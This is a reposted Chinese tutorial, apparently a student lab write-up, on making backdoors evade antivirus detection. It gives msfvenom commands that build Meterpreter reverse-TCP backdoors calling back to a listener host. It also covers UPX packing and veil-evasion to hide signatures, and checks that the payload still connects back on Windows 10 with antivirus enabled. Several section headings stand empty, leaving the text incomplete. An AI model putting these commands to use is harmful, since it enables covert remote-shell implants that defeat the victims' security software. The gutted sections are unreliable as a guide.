本文共 1581 字,大约阅读时间需要 5 分钟。
免杀是一种对恶意软件(如木马、后门程序)实施的技术,使其能够避开杀毒软件(AV)的检测。它也是渗透测试中常用的技巧。
要实现免杀,首先需要深入了解杀毒软件的工作原理。现代杀毒软件通过特征码检测、启发式检测以及基于行为的检测等技术来识别恶意程序。了解这些检测机制后,可以采取相应的技术手段对恶意程序进行加工或隐藏。
杀毒软件检测恶意代码的方法主要有以下几种:
免杀的主要目的是让恶意程序避开杀毒软件的检测。常见的应用场景包括渗透测试和网络攻防中的后门程序部署。
改变特征码:
改变行为:
通讯方式:
操作模式:
非常规方法:
通过VirusTotal等在线杀毒引擎对免杀程序进行检测,可以直观查看免杀效果。VirusTotal可以上传免杀处理后的程序进行全面扫描。
使用msfvenom编码器生成后门程序。例如:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.230.128 LPORT=5318 -f exe > met-encoded.exe
多次编码(如十次编码)效果有限,主要原因是杀毒软件已对msfvenom的编码模板进行了特征码识别。
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.121.133 LPORT=1314 -f jar > ljs_backdoor.java.jar
将C语言shellcode与UPX压缩壳结合,生成可执行文件,并通过veil-evasion工具进行特征值隐藏,完成免杀效果。
UPX压缩壳生成结果:
upx 20181314-backdoor.exe -o upx_20181314.exe
使用查壳工具可验证壳的存在。
在目标电脑(如Windows 10,杀毒软件开启的情况下)运行免杀程序,确保可以正常回连。
转载地址:http://frpaz.baihongyu.com/